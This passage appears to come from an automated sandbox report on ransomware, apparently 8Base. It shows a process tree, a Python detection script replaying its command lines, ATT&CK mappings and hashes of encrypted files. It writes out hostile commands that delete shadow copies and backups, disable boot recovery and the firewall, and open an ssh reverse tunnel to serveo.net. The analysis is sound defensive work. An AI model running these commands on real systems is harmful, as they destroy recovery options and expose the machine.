        PID:2576
        [5] C:\Windows\SysWOW64\chcp.com
          cmdline: chcp 65001
          PID:4768
        [5] C:\Windows\SysWOW64\netsh.exe
          cmdline: netsh wlan show networks mode=bssid
          PID:1952
        [5] C:\Windows\SysWOW64\findstr.exe
          cmdline: findstr "SSID BSSID Signal"
          PID:2516
  [2] C:\Users\Admin\AppData\Local\Temp\781D.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\781D.exe
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    PID:4480
    [3] C:\Users\Admin\AppData\Local\Temp\Ynigope.exe
      cmdline: "C:\Users\Admin\AppData\Local\Temp\Ynigope.exe"
      - Executes dropped EXE
      PID:3604
    [3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
      PID:3816
  [2] C:\Users\Admin\AppData\Local\Temp\8405.exe
    cmdline: C:\Users\Admin\AppData\Local\Temp\8405.exe
    - Executes dropped EXE
    PID:548
    [3] C:\Windows\SysWOW64\WerFault.exe
      cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1968
      - Program crash
      PID:3860
    [3] C:\Windows\SysWOW64\WerFault.exe
      cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 548 -s 1988
      - Program crash
      PID:4988
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    - Accesses Microsoft Outlook profiles
    PID:2636
  [2] C:\Windows\explorer.exe
    cmdline: C:\Windows\explorer.exe
    PID:4956
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:752
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:4844
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:2116
  [2] C:\Windows\explorer.exe
    cmdline: C:\Windows\explorer.exe
    PID:1424
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:3912
  [2] C:\Windows\explorer.exe
    cmdline: C:\Windows\explorer.exe
    PID:2188
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:4056
  [2] C:\Windows\explorer.exe
    cmdline: C:\Windows\explorer.exe
    PID:1372
  [2] C:\Windows\SysWOW64\explorer.exe
    cmdline: C:\Windows\SysWOW64\explorer.exe
    PID:1564
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵
- Suspicious use of AdjustPrivilegeToken
PID:548
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:1256
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:4148
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4284
-
C:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exeC:\Users\Admin\AppData\Local\Temp\C176.tmp\svchost.exe -debug3⤵PID:292
-
C:\Windows\SYSTEM32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\C176.tmp\aa_nts.dll",run4⤵PID:5136
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1508 -
C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exeC:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3548 -
C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1516 -
C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exeC:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe4⤵
- Executes dropped EXE
PID:2184
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\vssadmin.exevssadmin delete shadows /all /quiet4⤵
- Interacts with shadow copies
PID:3740
-
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3716
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
PID:2516
-
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
PID:1348
-
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet4⤵
- Deletes backup catalog
PID:276
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4736 -
C:\Windows\system32\netsh.exenetsh advfirewall set currentprofile state off4⤵
- Modifies Windows Firewall
PID:3320
-
-
C:\Windows\system32\netsh.exenetsh firewall set opmode mode=disable4⤵
- Modifies Windows Firewall
PID:4392
-
-
-
-
C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe"C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3176 -
C:\Users\Admin\AppData\Local\Microsoft\pZW}X.exeC:\Users\Admin\AppData\Local\Microsoft\pZW}X.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:212
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3664
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3736
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2468
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:3564
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 548 -ip 5481⤵PID:2280
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 548 -ip 5481⤵PID:2280
-
C:\Windows\system32\wbem\WmiApSrv.exeC:\Windows\system32\wbem\WmiApSrv.exe1⤵PID:4760
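The command lines in this tree are the ones a detection engineer keys on: the five-command recovery-inhibit sequence under cmd.exe (vssadmin, wmic, two bcdedit calls, wbadmin), the two netsh firewall calls, the dropped OpenSSH client opening a reverse tunnel (-R) to serveo.net, the netsh wlan discovery, and signed aspnet_compiler.exe copies started by binaries in the user's Temp directory. The Python below is an added example and not part of this sandbox report or its signature logic: it replays those command lines as process-creation events constructed from the tree (PIDs and parents follow its nesting), tags each with a rule, and correlates the hits. The event schema, the regular expressions, the ATT&CK technique mapping and the Temp-directory heuristic are my own assumptions; the report itself only lists Persistence and Privilege Escalation mappings.

```python
"""Command-line triage for the behaviours in the process tree above.
Added example, not part of the report: events are constructed from the tree;
schema, rules, ATT&CK mapping and the Temp-directory heuristic are assumptions."""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


# (ATT&CK technique, label, pattern applied to the lower-cased command line)
RULES = [
    ("T1490", "shadow copies deleted",
     re.compile(r"\bvssadmin(\.exe)?\s+delete\s+shadows|\bwmic(\.exe)?\s+shadowcopy\s+delete")),
    ("T1490", "backup catalog deleted", re.compile(r"\bwbadmin(\.exe)?\s+delete\s+catalog")),
    ("T1490", "boot recovery disabled",
     re.compile(r"\bbcdedit(\.exe)?\s+/set\s+\{default\}\s+"
                r"(recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures)")),
    ("T1562.004", "host firewall disabled",
     re.compile(r"\bnetsh(\.exe)?\s+(advfirewall\s+set\s+\w+\s+state\s+off"
                r"|firewall\s+set\s+opmode\s+mode=disable)")),
    ("T1572", "ssh reverse tunnel (-R) to an external relay",
     re.compile(r"\bssh(\.exe)?\b.*\s-r\s+\d+:")),
    ("T1016.002", "Wi-Fi profile/network discovery via netsh wlan",
     re.compile(r"\bnetsh(\.exe)?\s+wlan\s+show\s+(profiles|networks)")),
]

# A signed .NET framework tool started by a binary in the user's Temp folder is
# the hollowing pattern the tree shows (aspnet_compiler.exe under 73A6/75DA/781D);
# the parent/child relationship alone is enough to flag it, no memory data needed.
DOTNET_TOOL = re.compile(r"\\microsoft\.net\\framework(64)?\\v[\d.]+\\[^\\]+\.exe$")
USER_TEMP = re.compile(r"\\users\\[^\\]+\\appdata\\local\\temp\\")


def match_rules(cmdline):
    """Return the (technique, label) pairs whose pattern hits this command line."""
    low = cmdline.lower()
    return [(tech, label) for tech, label, pat in RULES if pat.search(low)]


def triage(events):
    """Tag every event, then correlate hits into the two higher-level findings."""
    by_pid = {e.pid: e for e in events}  # assumption: no PID reuse inside one batch
    hits = []                             # (pid, technique, label)
    recovery_kids = defaultdict(set)      # ppid -> child pids with a T1490 hit
    injection_hosts = []
    for e in events:
        for tech, label in match_rules(e.cmdline):
            hits.append((e.pid, tech, label))
            if tech == "T1490":
                recovery_kids[e.ppid].add(e.pid)
        parent = by_pid.get(e.ppid)
        if parent and DOTNET_TOOL.search(e.image.lower()) and USER_TEMP.search(parent.image.lower()):
            injection_hosts.append(e.pid)
    # Two or more distinct recovery-inhibiting children under one shell is the
    # pre-encryption sequence, not an admin running a single command.
    chain_parents = sorted(p for p, kids in recovery_kids.items() if len(kids) >= 2)
    return {"hits": hits, "injection_hosts": injection_hosts, "recovery_chain_parents": chain_parents}


TMP = r"C:\Users\Admin\AppData\Local\Temp"
ASPNET = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
SSH = r"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"
CMD = r"C:\Windows\system32\cmd.exe"
SAMPLE_EVENTS = [  # constructed from the tree above; parent PIDs follow its nesting
    ProcEvent(5000, 1, TMP + r"\73A6.exe", TMP + r"\73A6.exe"),
    ProcEvent(4156, 5000, ASPNET, ASPNET),
    ProcEvent(4276, 4156, r"C:\Windows\SysWOW64\cmd.exe",
              '"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"'),
    ProcEvent(1464, 4156, SSH, f'"{SSH}" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:2936 serveo.net'),
    ProcEvent(3548, 1508, r"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe",
              r"C:\Users\Admin\AppData\Local\Microsoft\n6)ZqKc3{.exe"),
    ProcEvent(2880, 3548, CMD, f'"{CMD}"'),
    ProcEvent(3740, 2880, r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ProcEvent(3716, 2880, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
    ProcEvent(2516, 2880, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ProcEvent(1348, 2880, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    ProcEvent(276, 2880, r"C:\Windows\system32\wbadmin.exe", "wbadmin delete catalog -quiet"),
    ProcEvent(4736, 3548, CMD, f'"{CMD}"'),
    ProcEvent(3320, 4736, r"C:\Windows\system32\netsh.exe", "netsh advfirewall set currentprofile state off"),
    ProcEvent(4392, 4736, r"C:\Windows\system32\netsh.exe", "netsh firewall set opmode mode=disable"),
    # Benign control (constructed, not from the tree): listing shadows is routine and must not fire.
    ProcEvent(7001, 1, r"C:\Windows\system32\vssadmin.exe", "vssadmin list shadows"),
]

if __name__ == "__main__":
    result = triage(SAMPLE_EVENTS)
    for pid, tech, label in result["hits"]:
        print(f"PID {pid:>5}  {tech:<10} {label}")
    print("hollowing hosts:", result["injection_hosts"])
    print("recovery-inhibit chains under PIDs:", result["recovery_chain_parents"])
```

Run as a script it prints one line per hit, then the aspnet_compiler.exe PID flagged by the parent/child heuristic and the cmd.exe PID under which the recovery-inhibit chain ran. The chain rule deliberately requires two or more distinct children so that a lone `vssadmin delete shadows` from an administrator does not page anyone; the firewall and tunnel rules fire on a single event because there is no routine reason for either on a workstation.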
Network
MITRE ATT&CK Enterprise v15 (count of matching signatures in parentheses)
Persistence
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
  Create or Modify System Process (1): Windows Service (1)
Downloads
Dumped files, one entry per distinct hash. Identical dumps are collapsed and the number of copies noted; only two entries carry a path in the report, the rest are recorded by hash alone.

- C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id[4FB2A4D5-3483].[[email protected]].8base
  Filesize: 2.7MB (1 copy)
  MD5: 8bd844b05a901070e2621c229ae94691
  SHA1: 558868c8b20d6653a8ece315d2aa73fe3948e316
  SHA256: 3d4d86a8132e5fbd19104e9ca2123b335924fb5fbd90c022c4994122e71744f3
  SHA512: 969e97225509fdf8d120415cf9829d6cd89c0967a6d4993588bd466c1cf25c81855992906860ea8ae923d64cd2ea789d9f39e0ba7f38945835968099e51491ce
- (no path recorded)
  Filesize: 393B (1 copy)
  MD5: 18015a60cd12f33648facec1263cfafa
  SHA1: 31b7afd9a2dc51bfad694e5772d430fceedbac3f
  SHA256: 9ab8d1a229e05070a0364b5c5efd2ab1ddf676b0bc00314ec336bcdc00998190
  SHA512: fcdb2e02f01c59916eaa08baeb74cc2f61eed6d96873f41a2299b752b9ec1af5db74a6eac6013c9a45a77d0bbc0431590f16fa74cff779eea97383e2fe073925
- (no path recorded)
  Filesize: 1KB (1 copy)
  MD5: 80baaa85a67fdc1a25bdd9827994bcad
  SHA1: 80919468e874f0281df476d1071dc8dd40187419
  SHA256: 41ea3f875990a0e8ff6a04d67f834422181f88ee8d3ad09fadda04dec1024a58
  SHA512: 38e5a4949264df20898ebbfbdc07f4ebd00ed1a50de9997b0238b9395db7e42435cc0f19b8682a3416e76d6b0e2bc42520fe79e9371f7f522ab35955f4ff9f44
- (no path recorded)
  Filesize: 847B (1 copy)
  MD5: c0aed85f01118e3d67e3b2a514a7a36b
  SHA1: 773e349d3ccadf77c7025d0450a337c538869f14
  SHA256: 1c144975fd84bd986810e9067c6381939683de5e00223dad95bb7fd85e157d62
  SHA512: 09027ddc074a09edc7da397af8369cf2bbf8c1c68f0ecac02151ea595a2e9499775abaa40e9b51fb96a9895a4901bd29daf7b83e93cc1f1f9ac64c39c999277d
- (no path recorded)
  Filesize: 927B (1 copy)
  MD5: 4a911455784f74e368a4c2c7876d76f4
  SHA1: a1700a0849ffb4f26671eb76da2489946b821c34
  SHA256: 264098e15b5b33d425f3b76e45b7976b58f917048125041135f7e60d8151108c
  SHA512: 4617591400409e1930195795a55e20d5f063042bb3e9fd1955099066e507b6ac8a1e3ae54cc42418e2639149b31bf7e58cd5743670d9030a15e29f14d813815d
- (no path recorded)
  Filesize: 1.7MB (10 copies)
  MD5: a6ab201ae407fbe4a5da5f20dc38412b
  SHA1: b3f8caf67f36730ad87031d206db91c861980615
  SHA256: 9d163fbffc9692a3143362c51d35d5ab52d1f209d9d5e053196c79a30e6f7acf
  SHA512: eb0e97119784d4f60ac5b1c499e4bdfa885243c8859d79e92e1c07a2aba3539606e5df978d8d63d7764fe898e691488a53d02fc495dc837b930cfe3d83cede2b
- (no path recorded)
  Filesize: 1.7MB (3 copies)
  MD5: 1611ddc5ba7af4c5f4c247c178ccdbb3
  SHA1: 4be33b42d1def3b0fc027b72efe233b6e05007e5
  SHA256: c40a4e9ac9b6cefbfdabd59a314fae01b7fcd0b91e0a7cd8b02afd105a234eb0
  SHA512: 6d1319e6f8db72bc50e8b77ac470ac1b42e2f34455604b651d1c50f14ad8464cf98feafb4b86f416155980aff9a353a3b6edac944cefa73ebc61b63f5718e0e5
- (no path recorded)
  Filesize: 468KB (2 copies)
  MD5: 20bb118569b859e64feaaf30227e04b8
  SHA1: 3fb2c608529575ad4b06770e130eb9d2d0750ed7
  SHA256: c1d2e8b7b961e48a1ee4877d3f527f038697e0dfcda69b8cd470900b73e1e674
  SHA512: 567906d7b98058ec24c1455d5167ee13127ce6739350f1f38954c01e46f96ba0851d6c88ef49a192edb53c5f759ab8663c7ac9fcc795c35db98165d11259587c
- (no path recorded)
  Filesize: 62KB (2 copies)
  MD5: 5f0bbf0b4ce5fa0bca57f1230e660dff
  SHA1: 529e438c21899eff993c0871ce07aff037d7f10d
  SHA256: a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d
  SHA512: ddede174b3aac4bbf434e1d61da8fa858b4bde11850a75b113376dccb7356f054a9fb696f498cb01c040cec33bb03d75c8c7b2787d46fc33569aeb753ee16131
- (no path recorded)
  Filesize: 61KB (4 copies)
  MD5: 4345b942eb187e2b867a6e9524d166e0
  SHA1: 1814c6a4205852069bbaaf9c8bd2809842d52548
  SHA256: 0b80d7aea7acb5d4bd7e6dbfabeaf5529faec78ff5b29fc525edc2c8bf7e537c
  SHA512: 85f5ecafcb711af6ace4ddb11ca3a8e8d2a4799ba07d258bb731d55dc36614139db760aeea6e1f1d3674bb045230ba9d247c13d895a7f3f85ea26967788a87d6
- (no path recorded)
  Filesize: 1.5MB (2 copies)
  MD5: 400261992d812b24ecd3bfe79700443c
  SHA1: f4f0d341cc860f046b2713939c70da32944f7eda
  SHA256: 222a5af34881bb68ffc370491a0f8d67b550cd368c49927715946365bbe8038f
  SHA512: ed25f5d636658f629625614a95d4bc7a999b10cb2689c38159afa5ff24afd5136119500d00ebe83d880702f9b8e560fb570d92199f56e865eccca9695b8582f9
- (no path recorded)
  Filesize: 902KB (2 copies)
  MD5: 480a66902e6e7cdafaa6711e8697ff8c
  SHA1: 6ac730962e7c1dba9e2ecc5733a506544f3c8d11
  SHA256: 7eaaaa6010bbcd6bb8c9ad08d4b0966c7aedc9b2ac24758f170012ac36e508b5
  SHA512: 7d010cd47b7d1adf66f9c97afc6c3805997aa5c7cc6ff13eddee81f24cf2b95a3fe375ec5b3d6185c0bc8840b4ad91ae143c73a39af26391cc182ab6a1793ba5
- (no path recorded)
  Filesize: 46B (1 copy)
  MD5: 3f05819f995b4dafa1b5d55ce8d1f411
  SHA1: 404449b79a16bfc4f64f2fd55cd73d5d27a85d71
  SHA256: 7e0bf0cbd06a087500a9c3b50254df3a8a2c2980921ab6a62ab1121941c80fc0
  SHA512: 34abb7df8b3a68e1649ff0d2762576a4d4e65da548e74b1aa65c2b82c1b89f90d053ecddac67c614ca6084dc5b2cb552949250fb70f49b536f1bcb0057717026
- (no path recorded)
  Filesize: 798KB (2 copies)
  MD5: 90aadf2247149996ae443e2c82af3730
  SHA1: 050b7eba825412b24e3f02d76d7da5ae97e10502
  SHA256: ee573647477339784dcef81024de1be1762833a20e5cc2b89a93e47d05b86b6a
  SHA512: eec32bb82b230dd309c29712e72d4469250e651449e127479d178eddbafd5a46ec8048a753bc2c1a0fdf1dc3ed72a9453ca66fb49cbf0f95a12704e5427182be
- (no path recorded)
  Filesize: 84KB (4 copies)
  MD5: 695069cac77763a345f1d32305a8c7ce
  SHA1: 509b592b750bd4f33392b3090494ea96ea966b4c
  SHA256: 514f00e1db1e1c5e797369e4e422b531e6d9ea2fbeb594cc33f571718037773e
  SHA512: 7cb60c8d9c6d3ed80e0c6bc902f8ea9243b29a945132c6a648f98ccac07674193c522679dc03fb8708262af000d0da6bf06a7c5e0a76b3946306e475ec3f9dd0
- (no path recorded)
  Filesize: 1.5MB (2 copies)
  MD5: 79a6e2268dfdba1d94c27f4b17265ff4
  SHA1: b17eed8cb6f454700f8bfcfd315d5627d3cf741c
  SHA256: 6562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
  SHA512: 3ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
- (no path recorded)
  Filesize: 914KB (3 copies)
  MD5: d1ce628a81ab779f1e8f7bf7df1bb32c
  SHA1: 011c90c704bb4782001d6e6ce1c647bf2bb17e01
  SHA256: 2afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
  SHA512: de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
- C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\ddwqx74p.default-release\cookies.sqlite.id[4FB2A4D5-3483].[[email protected]].8base
  Filesize: 96KB (1 copy)
  MD5: 077df49bbf6f9f33fcc2e3ae14d7cbff
  SHA1: 52e208c2555e81eb6649a70ac695619006a209cf
  SHA256: 3efc22511a55d7a4d6121d92763e25f1d014b7e514f25922a3aeeab00aa63eaa
  SHA512: 7727bb8299d532185ea5549cd84a0304a67b8552b91de5c2b26b1e75f891026643e729605ac8eaba465e80e1725acc64113a4701910fedd3f2d421b6908cb361